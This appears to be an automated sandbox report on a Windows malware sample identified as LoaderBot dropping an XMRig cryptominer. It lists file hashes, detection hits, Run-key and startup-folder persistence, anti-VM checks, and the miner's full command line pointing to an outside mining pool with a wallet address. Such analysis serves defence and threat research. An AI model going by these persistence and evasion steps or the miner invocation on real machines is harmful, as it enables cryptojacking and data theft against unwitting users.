Analysis
-
max time kernel
92s -
max time network
162s -
platform
windows10-2004_x64 -
resource
win10v2004-20231020-en -
resource tags
arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system -
submitted
21-10-2023 21:29
Static task
static1
Behavioral task
behavioral1
Sample
NEAS.b1f7d94305e0f729964239a69bffe320.exe
Resource
win7-20231020-en
General
-
Target
NEAS.b1f7d94305e0f729964239a69bffe320.exe
-
Size
501KB
-
MD5
b1f7d94305e0f729964239a69bffe320
-
SHA1
2fb02ffda0ce1fc5d719b9b79f2cdc2a0ead863a
-
SHA256
99bba4b98096259772dc0c12f0ebb3b3ff275f4babf75caa380e94e3dbed90c9
-
SHA512
3d6089b7b0f430020bb3a21e21aedbff81c28e8e97bb44c8b0fd6af1ea4bf6356a34b9bdf56bcdf51533dab48fa6446b825e1dbaa8ed38b380222f81bca03a45
-
SSDEEP
12288:VFTTWyVmRw8r6+y3QqBZAnYanJ252Wjx1ZP2BJ4iP:VFxVn8m+y3QqBZ6RK11Zw4q
Malware Config
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ chmxrtlvssjb.exe -
LoaderBot executable 1 IoCs
resource yara_rule behavioral2/memory/4252-18-0x0000000000490000-0x0000000000EC4000-memory.dmp loaderbot -
XMRig Miner payload 11 IoCs
resource yara_rule behavioral2/memory/3684-43-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3556-47-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3556-48-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3556-49-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3556-54-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3556-59-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3556-60-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3556-61-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3556-62-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3556-63-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3556-64-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion chmxrtlvssjb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion chmxrtlvssjb.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation chmxrtlvssjb.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url chmxrtlvssjb.exe -
Executes dropped EXE 3 IoCs
pid Process 4252 chmxrtlvssjb.exe 3684 Driver.exe 3556 Driver.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x0008000000022e30-2.dat themida behavioral2/files/0x0008000000022e30-3.dat themida behavioral2/memory/4252-18-0x0000000000490000-0x0000000000EC4000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\chmxrtlvssjb.exe" chmxrtlvssjb.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA chmxrtlvssjb.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 4252 chmxrtlvssjb.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 4252 chmxrtlvssjb.exe 4252 chmxrtlvssjb.exe 4252 chmxrtlvssjb.exe 4252 chmxrtlvssjb.exe 4252 chmxrtlvssjb.exe 4252 chmxrtlvssjb.exe 4252 chmxrtlvssjb.exe 4252 chmxrtlvssjb.exe 4252 chmxrtlvssjb.exe 4252 chmxrtlvssjb.exe 4252 chmxrtlvssjb.exe 4252 chmxrtlvssjb.exe 4252 chmxrtlvssjb.exe 4252 chmxrtlvssjb.exe 4252 chmxrtlvssjb.exe 4252 chmxrtlvssjb.exe 4252 chmxrtlvssjb.exe 4252 chmxrtlvssjb.exe 4252 chmxrtlvssjb.exe 4252 chmxrtlvssjb.exe 4252 chmxrtlvssjb.exe 4252 chmxrtlvssjb.exe 4252 chmxrtlvssjb.exe 4252 chmxrtlvssjb.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 652 Process not Found -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 4252 chmxrtlvssjb.exe Token: SeLockMemoryPrivilege 3684 Driver.exe Token: SeLockMemoryPrivilege 3684 Driver.exe Token: SeLockMemoryPrivilege 3556 Driver.exe Token: SeLockMemoryPrivilege 3556 Driver.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 2720 wrote to memory of 4252 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 90 PID 2720 wrote to memory of 4252 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 90 PID 2720 wrote to memory of 4252 2720 NEAS.b1f7d94305e0f729964239a69bffe320.exe 90 PID 4252 wrote to memory of 3684 4252 chmxrtlvssjb.exe 94 PID 4252 wrote to memory of 3684 4252 chmxrtlvssjb.exe 94 PID 4252 wrote to memory of 3556 4252 chmxrtlvssjb.exe 98 PID 4252 wrote to memory of 3556 4252 chmxrtlvssjb.exe 98
Processes
-
C:\Users\Admin\AppData\Local\Temp\NEAS.b1f7d94305e0f729964239a69bffe320.exe"C:\Users\Admin\AppData\Local\Temp\NEAS.b1f7d94305e0f729964239a69bffe320.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Users\Admin\AppData\Local\Temp\chmxrtlvssjb.exe"C:\Users\Admin\AppData\Local\Temp\chmxrtlvssjb.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4252 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 42K92y1uNN7PxEp57QZPiLQogD8pGGRjWQnqEemCTsXMSnqrhagsVujaeBc38hqrX88YL8Wh9pNQHRzTN7GBw8SqQkGBwg7 -p x -k -v=0 --donate-level=1 -t 43⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3684
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 42K92y1uNN7PxEp57QZPiLQogD8pGGRjWQnqEemCTsXMSnqrhagsVujaeBc38hqrX88YL8Wh9pNQHRzTN7GBw8SqQkGBwg7 -p x -k -v=0 --donate-level=1 -t 43⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3556
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.4MB
MD565af1033a01110ec64468bacbe3a7607
SHA19d1f8c17ce63803245c02a0e679ccde3fafcd48a
SHA2562531116b30534eb043a27f83fb4abdec24d212cf58673c117850256510f21264
SHA5129cd3932957dbf748793b9529e1f051532503c4cdef81f67cf86679b8415b92f90fbcae6f2473fb6c125de570dca0e501d11fca37ce4a9b8f554c8e22db322e54
-
Filesize
3.4MB
MD565af1033a01110ec64468bacbe3a7607
SHA19d1f8c17ce63803245c02a0e679ccde3fafcd48a
SHA2562531116b30534eb043a27f83fb4abdec24d212cf58673c117850256510f21264
SHA5129cd3932957dbf748793b9529e1f051532503c4cdef81f67cf86679b8415b92f90fbcae6f2473fb6c125de570dca0e501d11fca37ce4a9b8f554c8e22db322e54
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322